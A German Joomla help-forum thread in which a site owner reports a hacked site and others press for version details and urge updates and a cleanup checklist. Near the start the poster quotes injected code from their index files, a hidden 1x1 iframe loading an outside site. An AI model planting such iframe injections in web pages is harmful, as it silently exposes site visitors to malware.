Gehackt
Auch ich bin lt. Webhoster gehackt worden oder Joomla hat eine Sicherheitslücke.
Diese Fehlermeldung wurde mir geschickt:
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src='http://visions7.net/' width=1 height=1 style='v$
Es sind wohl immer die index-dateien betroffen.
Wenn ich mit Flottes Liste anschaue, habe ich ein Problem die Lücke zu finden, da ich einfach nur Anwender bin.
Kann mir hier noch jemand weiterhelfen?
Welche Joomlaversion hast du denn da ? Welche Erweiterungen in welcher Version ?
Ich habe die neuste 1.5.22
Die Erweiterungen sind alle älter die habe ich schon seit 1 Jahr, unter 1.5.17 lief alles stabil, aber lt. Webhoster musste ich aktualiseren.
Was erwartet Du nun eigentlich von uns? Wir können nicht hellsehen und kennen Deine Installation nicht. Scheinbar willst Du auch nicht mitteilen, was genau alles installiert ist.... somit kann man den Thread hier auch schließen. Er bringt keinen weiter...
Gruß! Uwe
fc-hosting.de
. . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun? :: Migration 1.7->2.5
Zitat von thomsch
Soll das heissen, alle Komponenten waren auf dem Stand von vor über einem Jahr?
Auch diese werden älter und bedürfen einer gewissen Pflege und Aktualität.
Wieder mal anscheinend ein klassicher Fall von mangelnder Wartung.
Behaupte ich mal ohne die Komponenten im einzelnen zu kennen.
Es winkt ab
Some1new
SUCHEN ist keine Stadt in Deutschland, sondern eine TOLLE Funktion in diesem Forum.
Fahren Sie mich irgendwohin, ich werde überall gebraucht, denn "Es iss ja, wie´s iss!".
Woher kommt mein Nickname? - some1new by escobar
Wird wohl so sein. Wer Webmaster ist, hat auch Verantwortung für seine Seiten (und trägt auch die rechtlichen Konsequenzen, die aus solchen Hacks entstehen können). Und muß die Versionen von CMS und Erweiterungen aktuell halten, da diese in neueren Versionen fast immer auch Sicherheitslücken stopfen. Das hast du offenbar über ein Jahr lang vernachlässigt. Wenn du ein Backup von vor über einem Jahr hast, spiel das ein und update alles unverzüglich. Wenn nicht, bleibt dir nichts anderes übrig, als dies als Lektion zu verstehen und die Seite von Grund auf neu zu machen.
Scheinbar bin ich hier im Forum falsch!!!
Ich habe ein kpl. Paket von 1.5.22
Als Erweiterungen verstehen ich Gästebuch, Foto, etc.
Diese sind wohl aktuell, da dort immer die neusten Updates angezeigt werden.
Ich habe mich mittlerweile an jemanden gewandt, der etwas von Programmierung versteht und dieser hat mir die Aussage bestätigt, dass die Version wohl Lücken hat.
Sonst kann ich nicht vestehen, dass innerhalb von vier Wochen die Homepages zweimal gehackt worden ist. Die PW sind so wie es empfohlen wird, da ich nicht erkennen kann wo die Lücken sind, mag man mir wohl nachsehen.
Ich verstehe die Angriffe hier nicht, wenn sich jemand die Software herunterladet, diese dann anhand des Handbuches installiert und die Zusatzprogramme nach Empfehlung auch einsetzt.
Habe ich einen falschen Nerv getroffen?
Sagt mir welche Infos ihr braucht um Hilfe zu leisten und nicht mit Angriffen antwortet.
Ehrlich gesagt, hab ich auf solche User keinen Bock mehr hier.
Sorry, dass ich das mal so schreibe und das es dem eigentlichen Problem nicht hilft.
1. Postings ändern, ok, aber dann behaupten etwas nicht gesagt zu haben, grenzwertig. Der Ersteller selbst hatte geschrieben, dass seine Erweiterungen älter als ein Jahr sind. Siehe mein Zitat im vorherigen Posting.
2. Wenn er jemanden kennt, der programmierung beherrscht, warum dann nicht Hilfe von diesem annehmen?
3. Es gibt hier überall zu finden, Flottes Liste, die exzellent erklärt, wie man nach einem Hack vorzugehen hat. X-fach übernommen und für richtig befunden von unzähligen Usern.
4. Aktuelle Version heisst nicht, daß die Erweiterung aktuell ist. Es gibt unzählige Erweiterungen, welche nicht mehr gepflegt werden und Lücken aufweisen, dennoch im Backend als aktuell angezeigt werden.
5. Dies ist Freizeit - dafür kriegt man hier als Aktiver kein Geld. Daher sollte man schon die Tipps und unzähligen Hilfestellungen in diesem Forum annehmen, statt zu nörgeln. Oder besser machen und darüber berichten.
Exit
Some1new
Geändert von Some1new (06.01.2011 um 19:32 Uhr)
SUCHEN ist keine Stadt in Deutschland, sondern eine TOLLE Funktion in diesem Forum.
Fahren Sie mich irgendwohin, ich werde überall gebraucht, denn "Es iss ja, wie´s iss!".
Woher kommt mein Nickname? - some1new by escobar
So wie du von Joomla die genaue Versionsnummer angegeben hast, solltest du es auch von allen installierten Erweiterungen tun.
Ungeachtet dessen musst du Flottes Liste von Anfang bis Ende abarbeiten.
-------- Gruß, Myrtus --------
www.myrtus-communis.de
Hallo !
ups.Sonst kann ich nicht vestehen, dass innerhalb von vier Wochen die Homepages zweimal gehackt worden ist.
Hast du denn nach dem 1. Mal die Lücke gefunden ?
Hast du komplett neu installiert ?
cool. hat er auch gesagt welche ? Dann wäre es ja einfach diese zu schliessen.und dieser hat mir die Aussage bestätigt, dass die Version wohl Lücken hat
Nimm es uns nicht übel , aber es ist schon eine schwierige Sache.
Schau dir mal die Threads mit dem Titel "gehacked" an. Die gibt es zu hauf und in den meisten bekommen wir hier "Brocken" hingeschmissen und dann wird gefordert..... hilf mir.. ihr wisst doch auf welchen Knopf ich drücken muss damit alles wieder richtig ist.
So einfach ist es leider nicht.
Hier wird wirklich schon sehr viel geholfen. Aber es ist mühselig immer und immer wieder dieselben Dinge zu schreiben
Flottes Liste , Flottes Liste , Flottes Liste...
Könnte man quasi programmieren. Wenn im Beitrag "gehacked" vorkommt , dann automatisch FLottes Liste an den User mailen ;-)
Aber zurück zu dir.
Joomla = 1.5.22
Welche Komponenten / Module hast du zusätzlich installiert ?
Oder .. welche Komplettversion meinst du ?
Andreas
Berechtigungen
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen